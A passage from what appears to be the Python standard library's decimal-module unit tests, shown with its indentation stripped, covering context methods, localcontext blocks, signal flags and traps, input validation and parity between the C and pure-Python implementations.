self.assertEqual(c.shift(Decimal(1), 2), d)
self.assertEqual(c.shift(1, Decimal(2)), d)
self.assertRaises(TypeError, c.shift, '1', 2)
self.assertRaises(TypeError, c.shift, 1, '2')
def test_subtract(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.subtract(Decimal(1), Decimal(2))
self.assertEqual(c.subtract(1, 2), d)
self.assertEqual(c.subtract(Decimal(1), 2), d)
self.assertEqual(c.subtract(1, Decimal(2)), d)
self.assertRaises(TypeError, c.subtract, '1', 2)
self.assertRaises(TypeError, c.subtract, 1, '2')
def test_to_eng_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_eng_string(Decimal(10))
self.assertEqual(c.to_eng_string(10), d)
self.assertRaises(TypeError, c.to_eng_string, '10')
def test_to_sci_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_sci_string(Decimal(10))
self.assertEqual(c.to_sci_string(10), d)
self.assertRaises(TypeError, c.to_sci_string, '10')
def test_to_integral_exact(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_exact(Decimal(10))
self.assertEqual(c.to_integral_exact(10), d)
self.assertRaises(TypeError, c.to_integral_exact, '10')
def test_to_integral_value(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_value(Decimal(10))
self.assertEqual(c.to_integral_value(10), d)
self.assertRaises(TypeError, c.to_integral_value, '10')
self.assertRaises(TypeError, c.to_integral_value, 10, 'x')
class CContextAPItests(ContextAPItests):
decimal = C
class PyContextAPItests(ContextAPItests):
decimal = P
class ContextWithStatement(unittest.TestCase):
# Can't do these as docstrings until Python 2.6
# as doctest can't handle __future__ statements
def test_localcontext(self):
# Use a copy of the current context in the block
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
with localcontext() as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertIsNot(orig_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context in the block
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
new_ctx = Context(prec=42)
with localcontext(new_ctx) as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertEqual(set_ctx.prec, new_ctx.prec, 'did not set correct context')
self.assertIsNot(new_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_localcontext_kwargs(self):
with self.decimal.localcontext(
prec=10, rounding=ROUND_HALF_DOWN,
Emin=-20, Emax=20, capitals=0,
clamp=1
) as ctx:
self.assertEqual(ctx.prec, 10)
self.assertEqual(ctx.rounding, self.decimal.ROUND_HALF_DOWN)
self.assertEqual(ctx.Emin, -20)
self.assertEqual(ctx.Emax, 20)
self.assertEqual(ctx.capitals, 0)
self.assertEqual(ctx.clamp, 1)
self.assertRaises(TypeError, self.decimal.localcontext, precision=10)
self.assertRaises(ValueError, self.decimal.localcontext, Emin=1)
self.assertRaises(ValueError, self.decimal.localcontext, Emax=-1)
self.assertRaises(ValueError, self.decimal.localcontext, capitals=2)
self.assertRaises(ValueError, self.decimal.localcontext, clamp=2)
self.assertRaises(TypeError, self.decimal.localcontext, rounding="")
self.assertRaises(TypeError, self.decimal.localcontext, rounding=1)
self.assertRaises(TypeError, self.decimal.localcontext, flags="")
self.assertRaises(TypeError, self.decimal.localcontext, traps="")
self.assertRaises(TypeError, self.decimal.localcontext, Emin="")
self.assertRaises(TypeError, self.decimal.localcontext, Emax="")
def test_local_context_kwargs_does_not_overwrite_existing_argument(self):
ctx = self.decimal.getcontext()
ctx.prec = 28
with self.decimal.localcontext(prec=10) as ctx2:
self.assertEqual(ctx.prec, 28)
def test_nested_with_statements(self):
# Use a copy of the supplied context in the block
Decimal = self.decimal.Decimal
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
Clamped = self.decimal.Clamped
Overflow = self.decimal.Overflow
orig_ctx = getcontext()
orig_ctx.clear_flags()
new_ctx = Context(Emax=384)
with localcontext() as c1:
self.assertEqual(c1.flags, orig_ctx.flags)
self.assertEqual(c1.traps, orig_ctx.traps)
c1.traps[Clamped] = True
c1.Emin = -383
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertRaises(Clamped, c1.create_decimal, '0e-999')
self.assertTrue(c1.flags[Clamped])
with localcontext(new_ctx) as c2:
self.assertEqual(c2.flags, new_ctx.flags)
self.assertEqual(c2.traps, new_ctx.traps)
self.assertRaises(Overflow, c2.power, Decimal('3.4e200'), 2)
self.assertFalse(c2.flags[Clamped])
self.assertTrue(c2.flags[Overflow])
del c2
self.assertFalse(c1.flags[Overflow])
del c1
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertFalse(orig_ctx.flags[Clamped])
self.assertFalse(orig_ctx.flags[Overflow])
self.assertFalse(new_ctx.flags[Clamped])
self.assertFalse(new_ctx.flags[Overflow])
def test_with_statements_gc1(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
del c1
with localcontext() as c2:
del c2
with localcontext() as c3:
del c3
with localcontext() as c4:
del c4
def test_with_statements_gc2(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
with localcontext(c1) as c2:
del c1
with localcontext(c2) as c3:
del c2
with localcontext(c3) as c4:
del c3
del c4
def test_with_statements_gc3(self):
Context = self.decimal.Context
localcontext = self.decimal.localcontext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
with localcontext() as c1:
del c1
n1 = Context(prec=1)
setcontext(n1)
with localcontext(n1) as c2:
del n1
self.assertEqual(c2.prec, 1)
del c2
n2 = Context(prec=2)
setcontext(n2)
del n2
self.assertEqual(getcontext().prec, 2)
n3 = Context(prec=3)
setcontext(n3)
self.assertEqual(getcontext().prec, 3)
with localcontext(n3) as c3:
del n3
self.assertEqual(c3.prec, 3)
del c3
n4 = Context(prec=4)
setcontext(n4)
del n4
self.assertEqual(getcontext().prec, 4)
with localcontext() as c4:
self.assertEqual(c4.prec, 4)
del c4
class CContextWithStatement(ContextWithStatement):
decimal = C
class PyContextWithStatement(ContextWithStatement):
decimal = P
class ContextFlags(unittest.TestCase):
def test_flags_irrelevant(self):
# check that the result (numeric result + flags raised) of an
# arithmetic operation doesn't depend on the current flags
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
Subnormal = self.decimal.Subnormal
def raise_error(context, flag):
if self.decimal == C:
context.flags[flag] = True
if context.traps[flag]:
raise flag
else:
context._raise_error(flag)
context = Context(prec=9, Emin = -425000000, Emax = 425000000,
rounding=ROUND_HALF_EVEN, traps=[], flags=[])
# operations that raise various flags, in the form (function, arglist)
operations = [
(context._apply, [Decimal("100E-425000010")]),
(context.sqrt, [Decimal(2)]),
(context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
]
# try various flags individually, then a whole lot at once
flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
[Inexact, Rounded, Underflow, Clamped, Subnormal]]
for fn, args in operations:
# find answer and flags raised using a clean context
context.clear_flags()
ans = fn(*args)
flags = [k for k, v in context.flags.items() if v]
for extra_flags in flagsets:
# set flags, before calling operation
context.clear_flags()
for flag in extra_flags:
raise_error(context, flag)
new_ans = fn(*args)
# flags that we expect to be set after the operation
expected_flags = list(flags)
for flag in extra_flags:
if flag not in expected_flags:
expected_flags.append(flag)
expected_flags.sort(key=id)
# flags we actually got
new_flags = [k for k,v in context.flags.items() if v]
new_flags.sort(key=id)
self.assertEqual(ans, new_ans,
"operation produces different answers depending on flags set: " +
"expected %s, got %s." % (ans, new_ans))
self.assertEqual(new_flags, expected_flags,
"operation raises different flags depending on flags set: " +
"expected %s, got %s" % (expected_flags, new_flags))
def test_flag_comparisons(self):
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
c = Context()
# Valid SignalDict
self.assertNotEqual(c.flags, c.traps)
self.assertNotEqual(c.traps, c.flags)
c.flags = c.traps
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
c.flags[Rounded] = True
c.traps = c.flags
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
d = {}
d.update(c.flags)
self.assertEqual(d, c.flags)
self.assertEqual(c.flags, d)
d[Inexact] = True
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
# Invalid SignalDict
d = {Inexact:False}
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
d = ["xyz"]
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
@requires_IEEE_754
def test_float_operation(self):
Decimal = self.decimal.Decimal
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
with localcontext() as c:
##### trap is off by default
self.assertFalse(c.traps[FloatOperation])
# implicit conversion sets the flag
c.clear_flags()
self.assertEqual(Decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertEqual(c.create_decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion does not set the flag
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
# comparison sets the flag
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
##### set the trap
c.traps[FloatOperation] = True
# implicit conversion raises
c.clear_flags()
self.assertRaises(FloatOperation, Decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertRaises(FloatOperation, c.create_decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion is silent
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
def test_float_comparison(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
def assert_attr(a, b, attr, context, signal=None):
context.clear_flags()
f = getattr(a, attr)
if signal == FloatOperation:
self.assertRaises(signal, f, b)
else:
self.assertIs(f(b), True)
self.assertTrue(context.flags[FloatOperation])
small_d = Decimal('0.25')
big_d = Decimal('3.0')
small_f = 0.25
big_f = 3.0
zero_d = Decimal('0.0')
neg_zero_d = Decimal('-0.0')
zero_f = 0.0
neg_zero_f = -0.0
inf_d = Decimal('Infinity')
neg_inf_d = Decimal('-Infinity')
inf_f = float('inf')
neg_inf_f = float('-inf')
def doit(c, signal=None):
# Order
for attr in '__lt__', '__le__':
assert_attr(small_d, big_f, attr, c, signal)
for attr in '__gt__', '__ge__':
assert_attr(big_d, small_f, attr, c, signal)
# Equality
assert_attr(small_d, small_f, '__eq__', c, None)
assert_attr(neg_zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(neg_zero_d, zero_f, '__eq__', c, None)
assert_attr(zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(zero_d, zero_f, '__eq__', c, None)
assert_attr(neg_inf_d, neg_inf_f, '__eq__', c, None)
assert_attr(inf_d, inf_f, '__eq__', c, None)
# Inequality
assert_attr(small_d, big_f, '__ne__', c, None)
assert_attr(Decimal('0.1'), 0.1, '__ne__', c, None)
assert_attr(neg_inf_d, inf_f, '__ne__', c, None)
assert_attr(inf_d, neg_inf_f, '__ne__', c, None)
assert_attr(Decimal('NaN'), float('nan'), '__ne__', c, None)
def test_containers(c, signal=None):
c.clear_flags()
s = set([100.0, Decimal('100.0')])
self.assertEqual(len(s), 1)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
if signal:
self.assertRaises(signal, sorted, [1.0, Decimal('10.0')])
else:
s = sorted([10.0, Decimal('10.0')])
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in [Decimal('10.0'), 1.0]
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in {Decimal('10.0'):'a', 1.0:'b'}
self.assertTrue(c.flags[FloatOperation])
nc = Context()
with localcontext(nc) as c:
self.assertFalse(c.traps[FloatOperation])
doit(c, signal=None)
test_containers(c, signal=None)
c.traps[FloatOperation] = True
doit(c, signal=FloatOperation)
test_containers(c, signal=FloatOperation)
def test_float_operation_default(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
FloatOperation= self.decimal.FloatOperation
context = Context()
self.assertFalse(context.flags[FloatOperation])
self.assertFalse(context.traps[FloatOperation])
context.clear_traps()
context.traps[Inexact] = True
context.traps[FloatOperation] = True
self.assertTrue(context.traps[FloatOperation])
self.assertTrue(context.traps[Inexact])
class CContextFlags(ContextFlags):
decimal = C
class PyContextFlags(ContextFlags):
decimal = P
class SpecialContexts(unittest.TestCase):
"""Test the context templates."""
def test_context_templates(self):
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
assert_signals(self, BasicContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow, Underflow, Clamped]
)
savecontext = getcontext().copy()
basic_context_prec = BasicContext.prec
extended_context_prec = ExtendedContext.prec
ex = None
try:
BasicContext.prec = ExtendedContext.prec = 441
for template in BasicContext, ExtendedContext:
setcontext(template)
c = getcontext()
self.assertIsNot(c, template)
self.assertEqual(c.prec, 441)
except Exception as e:
ex = e.__class__
finally:
BasicContext.prec = basic_context_prec
ExtendedContext.prec = extended_context_prec
setcontext(savecontext)
if ex:
raise ex
def test_default_context(self):
DefaultContext = self.decimal.DefaultContext
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
self.assertEqual(BasicContext.prec, 9)
self.assertEqual(ExtendedContext.prec, 9)
assert_signals(self, DefaultContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow]
)
savecontext = getcontext().copy()
default_context_prec = DefaultContext.prec
ex = None
try:
c = getcontext()
saveprec = c.prec
DefaultContext.prec = 961
c = getcontext()
self.assertEqual(c.prec, saveprec)
setcontext(DefaultContext)
c = getcontext()
self.assertIsNot(c, DefaultContext)
self.assertEqual(c.prec, 961)
except Exception as e:
ex = e.__class__
finally:
DefaultContext.prec = default_context_prec
setcontext(savecontext)
if ex:
raise ex
class CSpecialContexts(SpecialContexts):
decimal = C
class PySpecialContexts(SpecialContexts):
decimal = P
class ContextInputValidation(unittest.TestCase):
def test_invalid_context(self):
Context = self.decimal.Context
DefaultContext = self.decimal.DefaultContext
c = DefaultContext.copy()
# prec, Emax
for attr in ['prec', 'Emax']:
setattr(c, attr, 999999)
self.assertEqual(getattr(c, attr), 999999)
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(TypeError, setattr, c, attr, 'xyz')
# Emin
setattr(c, 'Emin', -999999)
self.assertEqual(getattr(c, 'Emin'), -999999)
self.assertRaises(ValueError, setattr, c, 'Emin', 1)
self.assertRaises(TypeError, setattr, c, 'Emin', (1,2,3))
self.assertRaises(TypeError, setattr, c, 'rounding', -1)
self.assertRaises(TypeError, setattr, c, 'rounding', 9)
self.assertRaises(TypeError, setattr, c, 'rounding', 1.0)
self.assertRaises(TypeError, setattr, c, 'rounding', 'xyz')
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
# Invalid attribute
self.assertRaises(AttributeError, setattr, c, 'emax', 100)
# Invalid signal dict
self.assertRaises(TypeError, setattr, c, 'flags', [])
self.assertRaises(KeyError, setattr, c, 'flags', {})
self.assertRaises(KeyError, setattr, c, 'traps',
{'InvalidOperation':0})
# Attributes cannot be deleted
for attr in ['prec', 'Emax', 'Emin', 'rounding', 'capitals', 'clamp',
'flags', 'traps']:
self.assertRaises(AttributeError, c.__delattr__, attr)
# Invalid attributes
self.assertRaises(TypeError, getattr, c, 9)
self.assertRaises(TypeError, setattr, c, 9)
# Invalid values in constructor
self.assertRaises(TypeError, Context, rounding=999999)
self.assertRaises(TypeError, Context, rounding='xyz')
self.assertRaises(ValueError, Context, clamp=2)
self.assertRaises(ValueError, Context, capitals=-1)
self.assertRaises(KeyError, Context, flags=["P"])
self.assertRaises(KeyError, Context, traps=["Q"])
# Type error in conversion
self.assertRaises(TypeError, Context, flags=(0,1))
self.assertRaises(TypeError, Context, traps=(1,0))
class CContextInputValidation(ContextInputValidation):
decimal = C
class PyContextInputValidation(ContextInputValidation):
decimal = P
class ContextSubclassing(unittest.TestCase):
def test_context_subclassing(self):
decimal = self.decimal
Decimal = decimal.Decimal
Context = decimal.Context
Clamped = decimal.Clamped
DivisionByZero = decimal.DivisionByZero
Inexact = decimal.Inexact
Overflow = decimal.Overflow
Rounded = decimal.Rounded
Subnormal = decimal.Subnormal
Underflow = decimal.Underflow
InvalidOperation = decimal.InvalidOperation
class MyContext(Context):
def __init__(self, prec=None, rounding=None, Emin=None, Emax=None,
capitals=None, clamp=None, flags=None,
traps=None):
Context.__init__(self)
if prec is not None:
self.prec = prec
if rounding is not None:
self.rounding = rounding
if Emin is not None:
self.Emin = Emin
if Emax is not None:
self.Emax = Emax
if capitals is not None:
self.capitals = capitals
if clamp is not None:
self.clamp = clamp
if flags is not None:
if isinstance(flags, list):
flags = {v:(v in flags) for v in OrderedSignals[decimal] + flags}
self.flags = flags
if traps is not None:
if isinstance(traps, list):
traps = {v:(v in traps) for v in OrderedSignals[decimal] + traps}
self.traps = traps
c = Context()
d = MyContext()
for attr in ('prec', 'rounding', 'Emin', 'Emax', 'capitals', 'clamp',
'flags', 'traps'):
self.assertEqual(getattr(c, attr), getattr(d, attr))
# prec
self.assertRaises(ValueError, MyContext, **{'prec':-1})
c = MyContext(prec=1)
self.assertEqual(c.prec, 1)
self.assertRaises(InvalidOperation, c.quantize, Decimal('9e2'), 0)
# rounding
self.assertRaises(TypeError, MyContext, **{'rounding':'XYZ'})
c = MyContext(rounding=ROUND_DOWN, prec=1)
self.assertEqual(c.rounding, ROUND_DOWN)
self.assertEqual(c.plus(Decimal('9.9')), 9)
# Emin
self.assertRaises(ValueError, MyContext, **{'Emin':5})
c = MyContext(Emin=-1, prec=1)
self.assertEqual(c.Emin, -1)
x = c.add(Decimal('1e-99'), Decimal('2.234e-2000'))
self.assertEqual(x, Decimal('0.0'))
for signal in (Inexact, Underflow, Subnormal, Rounded, Clamped):
self.assertTrue(c.flags[signal])
# Emax
self.assertRaises(ValueError, MyContext, **{'Emax':-1})
c = MyContext(Emax=1, prec=1)
self.assertEqual(c.Emax, 1)
self.assertRaises(Overflow, c.add, Decimal('1e99'), Decimal('2.234e2000'))
if self.decimal == C:
for signal in (Inexact, Overflow, Rounded):
self.assertTrue(c.flags[signal])
# capitals
self.assertRaises(ValueError, MyContext, **{'capitals':-1})
c = MyContext(capitals=0)
self.assertEqual(c.capitals, 0)
x = c.create_decimal('1E222')
self.assertEqual(c.to_sci_string(x), '1e+222')
# clamp
self.assertRaises(ValueError, MyContext, **{'clamp':2})
c = MyContext(clamp=1, Emax=99)
self.assertEqual(c.clamp, 1)
x = c.plus(Decimal('1e99'))
self.assertEqual(str(x), '1.000000000000000000000000000E+99')
# flags
self.assertRaises(TypeError, MyContext, **{'flags':'XYZ'})
c = MyContext(flags=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.flags[signal])
c.clear_flags()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.flags[signal])
# traps
self.assertRaises(TypeError, MyContext, **{'traps':'XYZ'})
c = MyContext(traps=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.traps[signal])
c.clear_traps()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.traps[signal])
class CContextSubclassing(ContextSubclassing):
decimal = C
class PyContextSubclassing(ContextSubclassing):
decimal = P
@skip_if_extra_functionality
class CheckAttributes(unittest.TestCase):
def test_module_attributes(self):
# Architecture dependent context limits
self.assertEqual(C.MAX_PREC, P.MAX_PREC)
self.assertEqual(C.MAX_EMAX, P.MAX_EMAX)
self.assertEqual(C.MIN_EMIN, P.MIN_EMIN)
self.assertEqual(C.MIN_ETINY, P.MIN_ETINY)
self.assertTrue(C.HAVE_THREADS is True or C.HAVE_THREADS is False)
self.assertTrue(P.HAVE_THREADS is True or P.HAVE_THREADS is False)
self.assertEqual(C.__version__, P.__version__)
self.assertEqual(dir(C), dir(P))
def test_context_attributes(self):
x = [s for s in dir(C.Context()) if '__' in s or not s.startswith('_')]
y = [s for s in dir(P.Context()) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
def test_decimal_attributes(self):
x = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
y = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
class Coverage(unittest.TestCase):
def test_adjusted(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal('1234e9999').adjusted(), 10002)
# XXX raise?
self.assertEqual(Decimal('nan').adjusted(), 0)
self.assertEqual(Decimal('inf').adjusted(), 0)
def test_canonical(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
x = Decimal(9).canonical()
self.assertEqual(x, 9)
c = getcontext()
x = c.canonical(Decimal(9))
self.assertEqual(x, 9)
def test_context_repr(self):
c = self.decimal.DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[self.decimal]:
c.flags[sig] = False
c.traps[sig] = False
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[], traps=[])"
self.assertEqual(s, t)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
# abs
self.assertEqual(abs(Decimal("-10")), 10)
# add
self.assertEqual(Decimal("7") + 1, 8)
# divide
self.assertEqual(Decimal("10") / 5, 2)
# divide_int
self.assertEqual(Decimal("10") // 7, 1)
# fma
self.assertEqual(Decimal("1.2").fma(Decimal("0.01"), 1), 1)
self.assertIs(Decimal("NaN").fma(7, 1).is_nan(), True)
# three arg power
self.assertEqual(pow(Decimal(10), 2, 7), 2)
# exp
self.assertEqual(Decimal("1.01").exp(), 3)
# is_normal
self.assertIs(Decimal("0.01").is_normal(), False)
# is_subnormal
self.assertIs(Decimal("0.01").is_subnormal(), True)
# ln
self.assertEqual(Decimal("20").ln(), 3)
# log10
self.assertEqual(Decimal("20").log10(), 1)
# logb
self.assertEqual(Decimal("580").logb(), 2)
# logical_invert
self.assertEqual(Decimal("10").logical_invert(), 1)
# minus
self.assertEqual(-Decimal("-10"), 10)
# multiply
self.assertEqual(Decimal("2") * 4, 8)
# next_minus
self.assertEqual(Decimal("10").next_minus(), 9)
# next_plus
self.assertEqual(Decimal("10").next_plus(), Decimal('2E+1'))
# normalize
self.assertEqual(Decimal("-10").normalize(), Decimal('-1E+1'))
# number_class
self.assertEqual(Decimal("10").number_class(), '+Normal')
# plus
self.assertEqual(+Decimal("-1"), -1)
# remainder
self.assertEqual(Decimal("10") % 7, 3)
# subtract
self.assertEqual(Decimal("10") - 7, 3)
# to_integral_exact
self.assertEqual(Decimal("1.12345").to_integral_exact(), 1)
# Boolean functions
self.assertTrue(Decimal("1").is_canonical())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("snan").is_snan())
self.assertTrue(Decimal("-1").is_signed())
self.assertTrue(Decimal("0").is_zero())
self.assertTrue(Decimal("0").is_zero())
# Copy
with localcontext() as c:
c.prec = 10000
x = 1228 ** 1523
y = -Decimal(x)
z = y.copy_abs()
self.assertEqual(z, x)
z = y.copy_negate()
self.assertEqual(z, x)
z = y.copy_sign(Decimal(1))
self.assertEqual(z, x)
def test_divmod(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
with localcontext() as c:
q, r = divmod(Decimal("10912837129"), 1001)
self.assertEqual(q, Decimal('10901935'))
self.assertEqual(r, Decimal('194'))
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
c.clear_flags()
q, r = divmod(Decimal("inf"), Decimal("inf"))
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal("inf"), 101)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal(0), 0)
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.traps[DivisionByZero] = False
c.clear_flags()
q, r = divmod(Decimal(11), 0)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation] and
c.flags[DivisionByZero])
def test_power(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
Overflow = self.decimal.Overflow
Rounded = self.decimal.Rounded
with localcontext() as c:
c.prec = 3
c.clear_flags()
self.assertEqual(Decimal("1.0") ** 100, Decimal('1.00'))
self.assertTrue(c.flags[Rounded])
c.prec = 1
c.Emax = 1
c.Emin = -1
c.clear_flags()
c.traps[Overflow] = False
self.assertEqual(Decimal(10000) ** Decimal("0.5"), Decimal('inf'))
self.assertTrue(c.flags[Overflow])
def test_quantize(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
c.traps[InvalidOperation] = False
x = Decimal(99).quantize(Decimal("1e1"))
self.assertTrue(x.is_nan())
def test_radix(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
self.assertEqual(Decimal("1").radix(), 10)
self.assertEqual(c.radix(), 10)
def test_rop(self):
Decimal = self.decimal.Decimal
for attr in ('__radd__', '__rsub__', '__rmul__', '__rtruediv__',
'__rdivmod__', '__rmod__', '__rfloordiv__', '__rpow__'):
self.assertIs(getattr(Decimal("1"), attr)("xyz"), NotImplemented)
def test_round(self):
# Python3 behavior: round() returns Decimal
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 28
self.assertEqual(str(Decimal("9.99").__round__()), "10")
self.assertEqual(str(Decimal("9.99e-5").__round__()), "0")
self.assertEqual(str(Decimal("1.23456789").__round__(5)), "1.23457")
self.assertEqual(str(Decimal("1.2345").__round__(10)), "1.2345000000")
self.assertEqual(str(Decimal("1.2345").__round__(-10)), "0E+10")
self.assertRaises(TypeError, Decimal("1.23").__round__, "5")
self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8)
def test_create_decimal(self):
c = self.decimal.Context()
self.assertRaises(ValueError, c.create_decimal, ["%"])
def test_int(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 9999
x = Decimal(1221**1271) / 10**3923
self.assertEqual(int(x), 1)
self.assertEqual(x.to_integral(), 2)
def test_copy(self):
Context = self.decimal.Context
c = Context()
c.prec = 10000
x = -(1172 ** 1712)
y = c.copy_abs(x)
self.assertEqual(y, -x)
y = c.copy_negate(x)
self.assertEqual(y, -x)
y = c.copy_sign(x, 1)
self.assertEqual(y, -x)
class CCoverage(Coverage):
decimal = C
class PyCoverage(Coverage):
decimal = P
class PyFunctionality(unittest.TestCase):
"""Extra functionality in decimal.py"""
def test_py_alternate_formatting(self):
# triples giving a format, a Decimal, and the expected result
Decimal = P.Decimal
localcontext = P.localcontext
test_values = [
# Issue 7094: Alternate formatting (specified by #)
('.0e', '1.0', '1e+0'),
('#.0e', '1.0', '1.e+0'),
('.0f', '1.0', '1'),
('#.0f', '1.0', '1.'),
('g', '1.1', '1.1'),
('#g', '1.1', '1.1'),
('.0g', '1', '1'),
('#.0g', '1', '1.'),
('.0%', '1.0', '100%'),
('#.0%', '1.0', '100.%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
class PyWhitebox(unittest.TestCase):
"""White box testing for decimal.py"""
def test_py_exact_power(self):
# Rarely exercised lines in _power_exact.
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
c.prec = 8
x = Decimal(2**16) ** Decimal("-0.5")
